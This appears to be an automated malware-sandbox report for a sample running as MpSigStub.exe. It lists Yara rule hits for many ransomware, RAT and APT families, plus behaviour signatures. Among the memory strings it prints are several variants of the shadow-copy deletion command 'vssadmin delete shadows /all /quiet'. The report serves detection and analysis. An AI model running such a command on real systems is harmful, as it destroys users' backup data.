Source: Yara match File source: 0000000B.00000003.18291811520.0000021B5EF98000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18321956088.0000021B5EDCA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Phorpiex smb component
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Clop Ransomware
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Ryuk ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Cerber ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Rhino ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Voidcrypt Ransomware
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18297885481.0000021B5F796000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected GoGoogle ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Delta Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Cryptolocker ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Found string related to ransomware
Source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp Binary or memory string: &act=gettext&lang=
Source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp Binary or memory string: &encrypted=
May drop file containing decryption instructions (likely related to ransomware)
Source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp Binary or memory string: HELP_instructions.html
Deletes shadow drive data (may be related to ransomware)
Source: MpSigStub.exe, 0000000B.00000003.18303689469.0000021B5EF98000.00000004.00000001.sdmp Binary or memory string: vssadmin delete shadows /all /quiet
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: vssadmin.exedeleteshadows/all/quiet
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: %vssadmin.exedeleteshadows/all/quiet
Source: MpSigStub.exe, 0000000B.00000003.18289348845.0000021B5EDA8000.00000004.00000001.sdmp Binary or memory string: vssadmin.exe delete shadows /all /quiet
Source: MpSigStub.exe, 0000000B.00000003.18322603018.0000021B5FB74000.00000004.00000001.sdmp Binary or memory string: vssadmin Delete Shadows /all /quiet
Source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp Binary or memory string: vssadmin delete shadows /all /for=
Source: MpSigStub.exe, 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp Binary or memory string: /C vssadmin delete shadows /all /quiet
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp Binary or memory string: Nvssadmin.exe Delete Shadows /All /Quiet
Source: MpSigStub.exe, 0000000B.00000003.18285768845.0000021B5EE0D000.00000004.00000001.sdmp Binary or memory string: vssadmindeleteshadows
Source: MpSigStub.exe, 0000000B.00000003.18301444780.0000021B5E291000.00000004.00000001.sdmp Binary or memory string: vssadmin.exe Delete Shadows /All /Quiet
Source: MpSigStub.exe, 0000000B.00000003.18271295741.0000021B5FAF1000.00000004.00000001.sdmp Binary or memory string: Nvssadmin.exe delete shadows /all /quiet
Source: MpSigStub.exe, 0000000B.00000003.18271875612.0000021B5DFCB000.00000004.00000001.sdmp Binary or memory string: /c vssadmin.exe delete shadows /all /quiet
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp Binary or memory string: 'vssadmin.exe delete shadows /all /quiet
Source: MpSigStub.exe, 0000000B.00000003.18316266171.0000021B5FBC6000.00000004.00000001.sdmp Binary or memory string: vssadmin delete shadows /all
Source: MpSigStub.exe, 0000000B.00000003.18295295594.0000021B5F05F000.00000004.00000001.sdmp Binary or memory string: vssadmindeleteshadows/all/quiet
Source: MpSigStub.exe, 0000000B.00000003.18295295594.0000021B5F05F000.00000004.00000001.sdmp Binary or memory string: !vssadmindeleteshadows/all/quiet

System Summary:

Malicious sample detected (through community Yara rule)
Source: 11.3.MpSigStub.exe.21b5e21e0f6.18.raw.unpack, type: UNPACKEDPE Matched rule: Detects Molerats sample - July 2017 Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5e61fb1a.216.raw.unpack, type: UNPACKEDPE Matched rule: dump_tool Author: @patrickrolsen
Source: 11.3.MpSigStub.exe.21b5fecf96e.186.raw.unpack, type: UNPACKEDPE Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 11.3.MpSigStub.exe.21b5fb37126.10.raw.unpack, type: UNPACKEDPE Matched rule: Detects Crypto Miner strings Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5f62017a.26.raw.unpack, type: UNPACKEDPE Matched rule: Detects Mini RAT malware Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5e1d7add.180.raw.unpack, type: UNPACKEDPE Matched rule: Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan) Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5fed0d72.115.raw.unpack, type: UNPACKEDPE Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 11.3.MpSigStub.exe.21b5e61fb1a.194.raw.unpack, type: UNPACKEDPE Matched rule: dump_tool Author: @patrickrolsen
Source: 11.3.MpSigStub.exe.21b5e1d6a89.179.raw.unpack, type: UNPACKEDPE Matched rule: Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan) Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5fe6a936.114.raw.unpack, type: UNPACKEDPE Matched rule: APT_DeputyDog_Fexel Author: ThreatConnect Intelligence Research Team
Source: 11.3.MpSigStub.exe.21b5e7207f6.69.raw.unpack, type: UNPACKEDPE Matched rule: Detects Fireball malware - file clearlog.dll Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5fece56a.117.raw.unpack, type: UNPACKEDPE Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 11.3.MpSigStub.exe.21b5e61fb1a.149.unpack, type: UNPACKEDPE Matched rule: dump_tool Author: @patrickrolsen
Source: 11.3.MpSigStub.exe.21b5f293752.82.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5f293752.82.unpack, type: UNPACKEDPE Matched rule: Detects ISMDoor Backdoor Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5e61fb1a.149.raw.unpack, type: UNPACKEDPE Matched rule: dump_tool Author: @patrickrolsen
Source: 11.3.MpSigStub.exe.21b5e61fb1a.194.unpack, type: UNPACKEDPE Matched rule: dump_tool Author: @patrickrolsen
Source: 11.3.MpSigStub.exe.21b5fecf96e.116.raw.unpack, type: UNPACKEDPE Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 11.3.MpSigStub.exe.21b5f5daeae.24.unpack, type: UNPACKEDPE Matched rule: Detects Mini RAT malware Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5f5daeae.24.unpack, type: UNPACKEDPE Matched rule: XOR loops from Sakula malware Author: David Cannings
Source: 11.3.MpSigStub.exe.21b5f5daeae.24.unpack, type: UNPACKEDPE Matched rule: The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project. Author: FireEye
Source: 11.3.MpSigStub.exe.21b5e1c2bca.202.raw.unpack, type: UNPACKEDPE Matched rule: Rule to detect Duqu 2.0 samples Author: unknown
Source: 11.3.MpSigStub.exe.21b5e21ccf2.17.raw.unpack, type: UNPACKEDPE Matched rule: Detects Molerats sample - July 2017 Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5e61fb1a.206.unpack, type: UNPACKEDPE Matched rule: dump_tool Author: @patrickrolsen
Source: 11.3.MpSigStub.exe.21b5f56923e.105.raw.unpack, type: UNPACKEDPE Matched rule: Keylogger component Author: Microsoft
Source: 11.3.MpSigStub.exe.21b5f56923e.105.raw.unpack, type: UNPACKEDPE Matched rule: Detects DNSpionage Karkoff malware Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5f56923e.105.raw.unpack, type: UNPACKEDPE Matched rule: Hack Deep Panda - htran-exe Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5f56923e.105.raw.unpack, type: UNPACKEDPE Matched rule: Detects HOPLIGHT malware used by HiddenCobra APT group Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5eec4df6.63.unpack, type: UNPACKEDPE Matched rule: LogKext is an open source keylogger for Mac OS X, a product of FSB software. Author: @mimeframe
Source: 11.3.MpSigStub.exe.21b5eec4df6.63.unpack, type: UNPACKEDPE Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5e21e0f6.18.unpack, type: UNPACKEDPE Matched rule: Detects Molerats sample - July 2017 Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5fb38b2a.11.raw.unpack, type: UNPACKEDPE Matched rule: Detects Crypto Miner strings Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5f3c65aa.44.raw.unpack, type: UNPACKEDPE Matched rule: Detects Derusbi Kernel Driver Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5f568a3a.106.raw.unpack, type: UNPACKEDPE Matched rule: Keylogger component Author: Microsoft
Source: 11.3.MpSigStub.exe.21b5f568a3a.106.raw.unpack, type: UNPACKEDPE Matched rule: Detects DNSpionage Karkoff malware Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5f568a3a.106.raw.unpack, type: UNPACKEDPE Matched rule: Hack Deep Panda - htran-exe Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5f568a3a.106.raw.unpack, type: UNPACKEDPE Matched rule: Detects HOPLIGHT malware used by HiddenCobra APT group Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5fe69132.113.raw.unpack, type: UNPACKEDPE Matched rule: APT_DeputyDog_Fexel Author: ThreatConnect Intelligence Research Team
Source: 11.3.MpSigStub.exe.21b5e5ccab6.147.unpack, type: UNPACKEDPE Matched rule: dump_tool Author: @patrickrolsen
Source: 11.3.MpSigStub.exe.21b5f3c57a6.43.raw.unpack, type: UNPACKEDPE Matched rule: Detects Derusbi Kernel Driver Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5e61fb1a.206.raw.unpack, type: UNPACKEDPE Matched rule: dump_tool Author: @patrickrolsen
Source: 11.3.MpSigStub.exe.21b5e721bfe.71.raw.unpack, type: UNPACKEDPE Matched rule: Detects Fireball malware - file clearlog.dll Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5f5daeae.14.unpack, type: UNPACKEDPE Matched rule: Detects Mini RAT malware Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5f5daeae.14.unpack, type: UNPACKEDPE Matched rule: XOR loops from Sakula malware Author: David Cannings
Source: 11.3.MpSigStub.exe.21b5f5daeae.14.unpack, type: UNPACKEDPE Matched rule: The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project. Author: FireEye
Source: 11.3.MpSigStub.exe.21b5e1d93b1.181.raw.unpack, type: UNPACKEDPE Matched rule: Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan) Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5fece56a.185.raw.unpack, type: UNPACKEDPE Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 11.3.MpSigStub.exe.21b5f3c49a2.45.raw.unpack, type: UNPACKEDPE Matched rule: Detects Derusbi Kernel Driver Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5f568236.104.raw.unpack, type: UNPACKEDPE Matched rule: Keylogger component Author: Microsoft
Source: 11.3.MpSigStub.exe.21b5f568236.104.raw.unpack, type: UNPACKEDPE Matched rule: Detects DNSpionage Karkoff malware Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5f568236.104.raw.unpack, type: UNPACKEDPE Matched rule: Hack Deep Panda - htran-exe Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5f568236.104.raw.unpack, type: UNPACKEDPE Matched rule: Detects HOPLIGHT malware used by HiddenCobra APT group Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5e61fb1a.216.unpack, type: UNPACKEDPE Matched rule: dump_tool Author: @patrickrolsen
Source: 11.3.MpSigStub.exe.21b5f62017a.58.raw.unpack, type: UNPACKEDPE Matched rule: Detects Mini RAT malware Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5fef5492.85.raw.unpack, type: UNPACKEDPE Matched rule: Detects Pupy RAT Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5fef5492.85.raw.unpack, type: UNPACKEDPE Matched rule: Detects Pupy backdoor Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5fed0d72.184.raw.unpack, type: UNPACKEDPE Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 11.3.MpSigStub.exe.21b5e1c15c6.201.raw.unpack, type: UNPACKEDPE Matched rule: Rule to detect Duqu 2.0 samples Author: unknown
Source: 11.3.MpSigStub.exe.21b5e21f4fa.19.raw.unpack, type: UNPACKEDPE Matched rule: Detects Molerats sample - July 2017 Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5e7211fa.70.raw.unpack, type: UNPACKEDPE Matched rule: Detects Fireball malware - file clearlog.dll Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5e4bf197.154.unpack, type: UNPACKEDPE Matched rule: Detects Tofu Trojan Author: Cylance
Source: 11.3.MpSigStub.exe.21b5e4bf197.154.unpack, type: UNPACKEDPE Matched rule: This rule looks for strings specific to the D programming language in combination with sections of an integer array which contains the encoded payload found within DShell Author: FireEye
Source: 11.3.MpSigStub.exe.21b5eec4df6.95.unpack, type: UNPACKEDPE Matched rule: LogKext is an open source keylogger for Mac OS X, a product of FSB software. Author: @mimeframe
Source: 11.3.MpSigStub.exe.21b5eec4df6.95.unpack, type: UNPACKEDPE Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5e4bcb15.155.unpack, type: UNPACKEDPE Matched rule: Detects Tofu Trojan Author: Cylance
Source: 11.3.MpSigStub.exe.21b5e4bcb15.155.unpack, type: UNPACKEDPE Matched rule: This rule looks for strings specific to the D programming language in combination with sections of an integer array which contains the encoded payload found within DShell Author: FireEye
Source: 11.3.MpSigStub.exe.21b5eec4df6.209.unpack, type: UNPACKEDPE Matched rule: LogKext is an open source keylogger for Mac OS X, a product of FSB software. Author: @mimeframe
Source: 11.3.MpSigStub.exe.21b5eec4df6.209.unpack, type: UNPACKEDPE Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5f5a3aed.13.unpack, type: UNPACKEDPE Matched rule: Detects Mini RAT malware Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5f5a3aed.13.unpack, type: UNPACKEDPE Matched rule: XOR loops from Sakula malware Author: David Cannings
Source: 11.3.MpSigStub.exe.21b5f5a3aed.13.unpack, type: UNPACKEDPE Matched rule: The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project. Author: FireEye
Source: 11.3.MpSigStub.exe.21b5f8ae31f.133.unpack, type: UNPACKEDPE Matched rule: Metasploit Payloads - file msf-psh.vba Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5f8ae31f.133.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_GORAT_5 Author: FireEye
Source: 11.3.MpSigStub.exe.21b5f8ae31f.133.unpack, type: UNPACKEDPE Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE Matched rule: Detects Mini RAT malware Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE Matched rule: XOR loops from Sakula malware Author: David Cannings
Source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_GORAT_5 Author: FireEye
Source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE Matched rule: The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project. Author: FireEye
Source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE Matched rule: Detects Mini RAT malware Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE Matched rule: XOR loops from Sakula malware Author: David Cannings
Source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_GORAT_5 Author: FireEye
Source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE Matched rule: The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project. Author: FireEye
Source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000000B.00000003.18322603018.0000021B5FB74000.00000004.00000001.sdmp, type: MEMORY Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp, type: MEMORY Matched rule: LogKext is an open source keylogger for Mac OS X, a product of FSB software. Author: @mimeframe
Source: 0000000B.00000003.18271592322.0000021B5FB74000.00000004.00000001.sdmp, type: MEMORY Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: 0000000B.00000003.18288932805.0000021B5ED46000.00000004.00000001.sdmp, type: MEMORY Matched rule: HackTool_MSIL_SharPersist_2 Author: FireEye
Source: 0000000B.00000003.18271011701.0000021B5F6D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 0000000B.00000003.18274401983.0000021B5F6D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 0000000B.00000003.18306005609.0000021B5FB74000.00000004.00000001.sdmp, type: MEMORY Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: 0000000B.00000003.18312668027.0000021B5E551000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Tofu Trojan Author: Cylance
Source: 0000000B.00000003.18275538227.0000021B5E924000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
Source: 0000000B.00000003.18263944103.0000021B5EC81000.00000004.00000001.sdmp, type: MEMORY Matched rule: CVE_2018_4878_0day_ITW Author: unknown
Source: 0000000B.00000003.18261319669.0000021B5FB74000.00000004.00000001.sdmp, type: MEMORY Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Xtrem RAT v3.5 Author: Jean-Philippe Teissier / @Jipe_
Source: 0000000B.00000003.18276333779.0000021B5E715000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Fireball malware - file clearlog.dll Author: Florian Roth
Source: 0000000B.00000003.18271875612.0000021B5DFCB000.00000004.00000001.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 0000000B.00000003.18284863225.0000021B5E924000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
Source: 0000000B.00000003.18281462328.0000021B5FEE5000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Pupy backdoor Author: Florian Roth
Source: 0000000B.00000003.18312010559.0000021B5FB74000.00000004.00000001.sdmp, type: MEMORY Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp, type: MEMORY Matched rule: APT_DeputyDog_Fexel Author: ThreatConnect Intelligence Research Team
Source: 0000000B.00000003.18282861052.0000021B5E41D000.00000004.00000001.sdmp, type: MEMORY Matched rule: APT_DeputyDog_Fexel Author: ThreatConnect Intelligence Research Team
Source: 0000000B.00000003.18317798030.0000021B5E551000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Tofu Trojan Author: Cylance
Source: 0000000B.00000003.18322267156.0000021B5F6D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 0000000B.00000003.18278226414.0000021B5E924000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
Source: 0000000B.00000003.18316266171.0000021B5FBC6000.00000004.00000001.sdmp, type: MEMORY Matched rule: Metasploit Payloads - file msf-psh.vba Author: Florian Roth
Source: 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp, type: MEMORY Matched rule: Keylogger component Author: Microsoft
Source: 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp, type: MEMORY Matched rule: Hack Deep Panda - htran-exe Author: Florian Roth
Source: 0000000B.00000003.18292104164.0000021B5EFDB000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects a ZxShell - CN threat group Author: Florian Roth
Source: 0000000B.00000003.18260963344.0000021B5FB33000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Crypto Miner strings Author: Florian Roth
Source: 0000000B.00000003.18292386350.0000021B5F01C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Xtrem RAT v3.5 Author: Jean-Philippe Teissier / @Jipe_
Source: 0000000B.00000003.18293242978.0000021B5FEA2000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects OilRig malware Author: Eyal Sela
Source: 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Fireball malware - file clearlog.dll Author: Florian Roth
Source: 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp, type: MEMORY Matched rule: PoisonIvy_3 Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: LogKext is an open source keylogger for Mac OS X, a product of FSB software. Author: @mimeframe
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: Metasploit Payloads - file msf-psh.vba Author: Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: Detects Tofu Trojan Author: Cylance
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: Hack Deep Panda - htran-exe Author: Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: Detects Pupy backdoor Author: Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: Iron Panda Malware Htran Author: Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: HackTool_MSIL_SharPersist_2 Author: FireEye
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: APT_DeputyDog_Fexel Author: ThreatConnect Intelligence Research Team
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: PoisonIvy_3 Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: CVE_2018_4878_0day_ITW Author: unknown
Detected potential crypto function
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Process Stats: CPU usage > 98%
PE file contains strange resources
Source: 1gPmnCR2PX.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpCmdRun.exe.17.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpCopyAccelerator.exe.17.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpDlpCmd.exe.17.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpCmdRun.exe0.17.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpCopyAccelerator.exe0.17.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpAsDesc.dll.17.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpOAV.dll.17.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpUxAgent.dll.17.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpAsDesc.dll0.17.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpOAV.dll0.17.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Section loaded: edgegdi.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\MpSigStub.exe Section loaded: edgegdi.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Section loaded: edgegdi.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Section loaded: sfc.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Section loaded: phoneinfo.dll
Creates driver files
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\Drivers\WdBoot.sys
Uses 32bit PE files
Source: 1gPmnCR2PX.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Yara signature match
